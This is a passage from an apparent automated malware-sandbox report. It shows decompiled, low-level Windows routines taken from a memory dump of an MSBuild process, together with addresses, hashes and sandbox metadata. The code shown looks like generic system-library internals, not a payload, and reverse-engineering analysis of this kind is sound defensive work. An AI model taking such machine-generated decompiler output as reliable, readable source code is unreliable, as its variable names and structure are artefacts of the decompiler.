																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x119b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x11984c0;
																			if(_t82 >=  *0x11984c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01179063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E010A922A(_t99);
										_t64 = E010C7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01178B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x11986c0; // 0xc507b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x11986b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x11986bc;
													_t87 = 0x11986b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E010A9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x11986c4;
												_t87 = 0x11986c0;
												L27:
												E010D9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E010FD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1195388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x119538c = _t51;
						goto L6;
					}
				}
			}




















                                                                                                0x010a9082
                                                                                                0x010a9083
                                                                                                0x010a9084
                                                                                                0x010a9085
                                                                                                0x010a9087
                                                                                                0x010a9096
                                                                                                0x010a9098
                                                                                                0x010a9098
                                                                                                0x010a909e
                                                                                                0x010a90a8
                                                                                                0x010a90e7
                                                                                                0x010a90e7
                                                                                                0x010a90aa
                                                                                                0x010a90b0
                                                                                                0x010a90b7
                                                                                                0x010a90bd
                                                                                                0x010a90dd
                                                                                                0x010a90e6
                                                                                                0x010a90bf
                                                                                                0x010a90bf
                                                                                                0x010a90c7
                                                                                                0x010a90cf
                                                                                                0x010a90f1
                                                                                                0x010a90f2
                                                                                                0x010a90f4
                                                                                                0x010a90f5
                                                                                                0x010a90f6
                                                                                                0x010a90f7
                                                                                                0x010a90f8
                                                                                                0x010a90f9
                                                                                                0x010a90fa
                                                                                                0x010a90fb
                                                                                                0x010a90fc
                                                                                                0x010a90fd
                                                                                                0x010a90fe
                                                                                                0x010a90ff
                                                                                                0x010a9100
                                                                                                0x010a9102
                                                                                                0x010a9107
                                                                                                0x010a910c
                                                                                                0x010a9110
                                                                                                0x010a9113
                                                                                                0x010a9115
                                                                                                0x010a9136
                                                                                                0x010a913f
                                                                                                0x010a9143
                                                                                                0x011037e4
                                                                                                0x011037e4
                                                                                                0x010a9117
                                                                                                0x010a9117
                                                                                                0x010a911d
                                                                                                0x00000000
                                                                                                0x010a911f
                                                                                                0x010a911f
                                                                                                0x010a9125
                                                                                                0x00000000
                                                                                                0x010a9127
                                                                                                0x010a912d
                                                                                                0x010a9130
                                                                                                0x010a9134
                                                                                                0x010a9158
                                                                                                0x010a915d
                                                                                                0x010a9161
                                                                                                0x010a9168
                                                                                                0x01103715
                                                                                                0x010a916e
                                                                                                0x010a916e
                                                                                                0x010a9175
                                                                                                0x010a9177
                                                                                                0x010a917e
                                                                                                0x010a917f
                                                                                                0x010a9182
                                                                                                0x010a9182
                                                                                                0x010a9187
                                                                                                0x010a9187
                                                                                                0x010a918a
                                                                                                0x010a918d
                                                                                                0x010a918f
                                                                                                0x010a9192
                                                                                                0x010a9195
                                                                                                0x010a9198
                                                                                                0x010a9198
                                                                                                0x010a9198
                                                                                                0x010a919a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0110371f
                                                                                                0x01103721
                                                                                                0x01103727
                                                                                                0x0110372f
                                                                                                0x01103733
                                                                                                0x01103735
                                                                                                0x01103738
                                                                                                0x0110373b
                                                                                                0x0110373d
                                                                                                0x01103740
                                                                                                0x00000000
                                                                                                0x01103746
                                                                                                0x01103746
                                                                                                0x01103749
                                                                                                0x00000000
                                                                                                0x0110374f
                                                                                                0x0110374f
                                                                                                0x01103751
                                                                                                0x01103757
                                                                                                0x01103759
                                                                                                0x0110375c
                                                                                                0x0110375c
                                                                                                0x0110375e
                                                                                                0x0110375e
                                                                                                0x01103761
                                                                                                0x01103764
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01103766
                                                                                                0x01103768
                                                                                                0x011037a3
                                                                                                0x011037a3
                                                                                                0x011037a5
                                                                                                0x011037a7
                                                                                                0x011037ad
                                                                                                0x011037b0
                                                                                                0x011037b2
                                                                                                0x011037bc
                                                                                                0x011037c2
                                                                                                0x011037c2
                                                                                                0x011037b2
                                                                                                0x010a9187
                                                                                                0x010a9187
                                                                                                0x010a918a
                                                                                                0x010a918d
                                                                                                0x010a918f
                                                                                                0x010a9192
                                                                                                0x010a9195
                                                                                                0x00000000
                                                                                                0x010a9195
                                                                                                0x00000000
                                                                                                0x0110376a
                                                                                                0x0110376a
                                                                                                0x0110376a
                                                                                                0x0110376c
                                                                                                0x0110376c
                                                                                                0x0110376f
                                                                                                0x01103775
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01103777
                                                                                                0x01103779
                                                                                                0x01103782
                                                                                                0x01103787
                                                                                                0x01103789
                                                                                                0x01103790
                                                                                                0x01103790
                                                                                                0x0110378b
                                                                                                0x0110378b
                                                                                                0x0110378b
                                                                                                0x01103792
                                                                                                0x01103795
                                                                                                0x00000000
                                                                                                0x01103795
                                                                                                0x00000000
                                                                                                0x01103779
                                                                                                0x01103798
                                                                                                0x00000000
                                                                                                0x01103798
                                                                                                0x00000000
                                                                                                0x01103768
                                                                                                0x0110379b
                                                                                                0x0110379b
                                                                                                0x01103751
                                                                                                0x01103749
                                                                                                0x00000000
                                                                                                0x01103740
                                                                                                0x010a91a0
                                                                                                0x010a91a3
                                                                                                0x010a91a9
                                                                                                0x010a91b0
                                                                                                0x00000000
                                                                                                0x010a91b0
                                                                                                0x010a9187
                                                                                                0x010a91b4
                                                                                                0x010a91b4
                                                                                                0x010a91bb
                                                                                                0x010a91c0
                                                                                                0x010a91c5
                                                                                                0x010a91c7
                                                                                                0x011037da
                                                                                                0x010a91cd
                                                                                                0x010a91cd
                                                                                                0x010a91cd
                                                                                                0x010a91d2
                                                                                                0x010a91d5
                                                                                                0x010a9239
                                                                                                0x010a9239
                                                                                                0x010a91d7
                                                                                                0x010a91db
                                                                                                0x010a91e1
                                                                                                0x010a91e7
                                                                                                0x010a91fd
                                                                                                0x010a9203
                                                                                                0x010a921e
                                                                                                0x010a9223
                                                                                                0x00000000
                                                                                                0x010a9205
                                                                                                0x010a9205
                                                                                                0x010a9208
                                                                                                0x010a920c
                                                                                                0x010a9214
                                                                                                0x010a9214
                                                                                                0x010a920c
                                                                                                0x010a91e9
                                                                                                0x010a91e9
                                                                                                0x010a91ee
                                                                                                0x010a91f3
                                                                                                0x010a91f3
                                                                                                0x010a91f3
                                                                                                0x010a91e7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010a9134
                                                                                                0x010a9125
                                                                                                0x010a911d
                                                                                                0x010a914e
                                                                                                0x010a90d1
                                                                                                0x010a90d1
                                                                                                0x010a90d3
                                                                                                0x010a90d6
                                                                                                0x010a90d8
                                                                                                0x00000000
                                                                                                0x010a90d8
                                                                                                0x010a90cf

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9a846817ebdf1a0df974f1c3b6e43ba1dcf03e55d145e8e9c725993e98b4ef5c
                                                                                                • Instruction ID: 6df93e7a5b0812b5da4b77e9c4aec1e1b5073e24bc9e55bcc5cf0b249450b8b2
                                                                                                • Opcode Fuzzy Hash: 9a846817ebdf1a0df974f1c3b6e43ba1dcf03e55d145e8e9c725993e98b4ef5c
                                                                                                • Instruction Fuzzy Hash: 6C01F4726052059FD36A8F58D840B15BBEAEF41364F218066E2519B692C370DC81CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0113C450 Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 46%
                                                                                                			E0113C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E010E9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E010E95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E010E95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E010E95D0();
				return L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                                                                0x0113c458
                                                                                                0x0113c45d
                                                                                                0x0113c466
                                                                                                0x0113c468
                                                                                                0x0113c469
                                                                                                0x0113c46a
                                                                                                0x0113c46b
                                                                                                0x0113c46e
                                                                                                0x0113c46f
                                                                                                0x0113c471
                                                                                                0x0113c476
                                                                                                0x0113c476
                                                                                                0x0113c47c
                                                                                                0x0113c47e
                                                                                                0x0113c480
                                                                                                0x0113c480
                                                                                                0x0113c483
                                                                                                0x0113c484
                                                                                                0x0113c486
                                                                                                0x0113c488
                                                                                                0x0113c48f
                                                                                                0x0113c491
                                                                                                0x0113c493
                                                                                                0x0113c493
                                                                                                0x0113c48f
                                                                                                0x0113c498
                                                                                                0x0113c49e
                                                                                                0x0113c4ad
                                                                                                0x0113c4ad
                                                                                                0x0113c4b2
                                                                                                0x0113c4b4
                                                                                                0x0113c4cd

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                • Instruction ID: 8bac43da4db4e5d6296c8158ab72582dc9bd3a5f0a79fc744dbc238f772d1e7f
                                                                                                • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                • Instruction Fuzzy Hash: 8A019672140606BFE725AF69CC84EA2FB6DFF94754F004525F25452560C721ECA0CBE0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01174015 Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 86%
                                                                                                			E01174015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E010C2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E010C2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x11986ac);
					E010AF900(0x11986d4, _t28);
					E010BFFB0(0x11986ac, _t28, 0x11986ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E010BFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                                                0x0117401a
                                                                                                0x0117401e
                                                                                                0x01174023
                                                                                                0x01174028
                                                                                                0x01174029
                                                                                                0x0117402b
                                                                                                0x0117402f
                                                                                                0x01174043
                                                                                                0x01174046
                                                                                                0x01174051
                                                                                                0x01174057
                                                                                                0x0117405f
                                                                                                0x01174062
                                                                                                0x01174067
                                                                                                0x0117406f
                                                                                                0x0117407c
                                                                                                0x0117407c
                                                                                                0x0117408c
                                                                                                0x0117408c
                                                                                                0x01174097

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a7b940c2c45b3a9f1b5d48c9d7e65b923a3df73b19873e6e32ea178154973d72
                                                                                                • Instruction ID: a81478f3c6289dbb44b8b7b0f32f264a8711893f2e403752d14e6475a53a81bc
                                                                                                • Opcode Fuzzy Hash: a7b940c2c45b3a9f1b5d48c9d7e65b923a3df73b19873e6e32ea178154973d72
                                                                                                • Instruction Fuzzy Hash: C1018F7224194A7FD715AF69CD84E97F7ACFF55A60B000229F54887A51CB24EC11CAE4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0116138A Relevance: .0, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 61%
                                                                                                			E0116138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x119d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E010EFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E010C7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                                0x0116138a
                                                                                                0x0116138a
                                                                                                0x01161399
                                                                                                0x011613a3
                                                                                                0x011613a8
                                                                                                0x011613aa
                                                                                                0x011613b5
                                                                                                0x011613bb
                                                                                                0x011613c3
                                                                                                0x011613c6
                                                                                                0x011613c9
                                                                                                0x011613d4
                                                                                                0x011613e6
                                                                                                0x011613d6
                                                                                                0x011613df
                                                                                                0x011613df
                                                                                                0x011613f1
                                                                                                0x011613f2
                                                                                                0x011613f4
                                                                                                0x011613f9
                                                                                                0x0116140e

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bcd88d652b2163fbd0b01ef7476a7078c552920837ee4a6c394aad23bde76282
                                                                                                • Instruction ID: 4f8a5456fb37ed0f80e6f1d60041c095033d8f17145533c623a5c66a559d7811
                                                                                                • Opcode Fuzzy Hash: bcd88d652b2163fbd0b01ef7476a7078c552920837ee4a6c394aad23bde76282
                                                                                                • Instruction Fuzzy Hash: E5019271A04209AFCB14DFA9D845EAEBBB8EF44710F044066B911EB280D6749A40CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 011614FB Relevance: .0, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 61%
                                                                                                			E011614FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x119d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E010EFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E010C7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                                0x011614fb
                                                                                                0x011614fb
                                                                                                0x0116150a
                                                                                                0x01161514
                                                                                                0x01161519
                                                                                                0x0116151b
                                                                                                0x01161526
                                                                                                0x0116152c
                                                                                                0x01161534
                                                                                                0x01161537
                                                                                                0x0116153a
                                                                                                0x01161545
                                                                                                0x01161557
                                                                                                0x01161547
                                                                                                0x01161550
                                                                                                0x01161550
                                                                                                0x01161562
                                                                                                0x01161563
                                                                                                0x01161565
                                                                                                0x0116156a
                                                                                                0x0116157f

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 46591b733184263d145b579fc2fb1564a35a5ff67c10f3e478c9d2af7dd16933
                                                                                                • Instruction ID: 92b7021269968d03f9d329e85b5b74d40bd128ca2132638aae6b56da6e2e0f34
                                                                                                • Opcode Fuzzy Hash: 46591b733184263d145b579fc2fb1564a35a5ff67c10f3e478c9d2af7dd16933
                                                                                                • Instruction Fuzzy Hash: B1019271A00249AFCB14DFA9D845EEEBBB8EF45700F444066F915EB280D674DA40CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010A58EC Relevance: .0, Instructions: 47COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 91%
                                                                                                			E010A58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x119d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1085c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E010A5943() != 0 &&  *0x1195320 > 5) {
					E01127B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01127B5E( &_v28, _t28);
					_t11 = E01127B9C(0x1195320, 0x108bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E010EB640(_t11, _t17, _v8 ^ _t29, 0x108bf15, _t27, _t28);
			}















                                                                                                0x010a58fb
                                                                                                0x010a58fe
                                                                                                0x010a5906
                                                                                                0x010a590a
                                                                                                0x010a593c
                                                                                                0x010a593c
                                                                                                0x010a590c
                                                                                                0x010a590c
                                                                                                0x010a5911
                                                                                                0x00000000
                                                                                                0x010a5913
                                                                                                0x010a5913
                                                                                                0x010a5913
                                                                                                0x010a5911
                                                                                                0x010a591d
                                                                                                0x01101035
                                                                                                0x0110103c
                                                                                                0x0110103f
                                                                                                0x01101056
                                                                                                0x01101056
                                                                                                0x010a593b

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ebe79751e20a46e0e2e5fe4d1763fd01fe0c07727ca793789a3eed01d55df322
                                                                                                • Instruction ID: 55d9a137a2884655eaf224d2b6d7b2c7b0464043f70a3ece3ed2e7248b7909de
                                                                                                • Opcode Fuzzy Hash: ebe79751e20a46e0e2e5fe4d1763fd01fe0c07727ca793789a3eed01d55df322
                                                                                                • Instruction Fuzzy Hash: CF01D431A04105EBCB18EAA9DC009AF77A8FB51230F8400A9DA95AB284DF20DD01C650
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010BB02A Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010BB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E010C7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01127016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                                                0x010bb037
                                                                                                0x010bb039
                                                                                                0x010bb03b
                                                                                                0x010bb040
                                                                                                0x0110a60e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0110a61d
                                                                                                0x010bb04b
                                                                                                0x010bb04e
                                                                                                0x0110a627
                                                                                                0x0110a634
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0110a641
                                                                                                0x0110a653
                                                                                                0x0110a643
                                                                                                0x0110a64c
                                                                                                0x0110a64c
                                                                                                0x0110a65b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0110a66c
                                                                                                0x010bb057
                                                                                                0x010bb057
                                                                                                0x010bb057
                                                                                                0x010bb046
                                                                                                0x010bb046
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                • Instruction ID: d06120eb433172afed0745a2744b03677beadeb28a8733c897db3b9a5f401aa4
                                                                                                • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                • Instruction Fuzzy Hash: BA018472610A809FE327875CD9C4FBA7BE8EF95750F0900A1FA55CB691D768DC40C621
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01171074 Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E01171074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0117165E(__ebx, 0x1198ae4, (__edx -  *0x1198b04 >> 0x14) + (__edx -  *0x1198b04 >> 0x14), __edi, __ecx, (__edx -  *0x1198b04 >> 0x14) + (__edx -  *0x1198b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0116AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E010C7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0115FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                                                                0x01171074
                                                                                                0x01171080
                                                                                                0x01171082
                                                                                                0x0117108a
                                                                                                0x0117108f
                                                                                                0x01171093
                                                                                                0x011710ab
                                                                                                0x011710ab
                                                                                                0x011710c3
                                                                                                0x011710cf
                                                                                                0x011710e1
                                                                                                0x011710d1
                                                                                                0x011710da
                                                                                                0x011710da
                                                                                                0x011710e9
                                                                                                0x011710f5
                                                                                                0x011710f5
                                                                                                0x011710fe

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
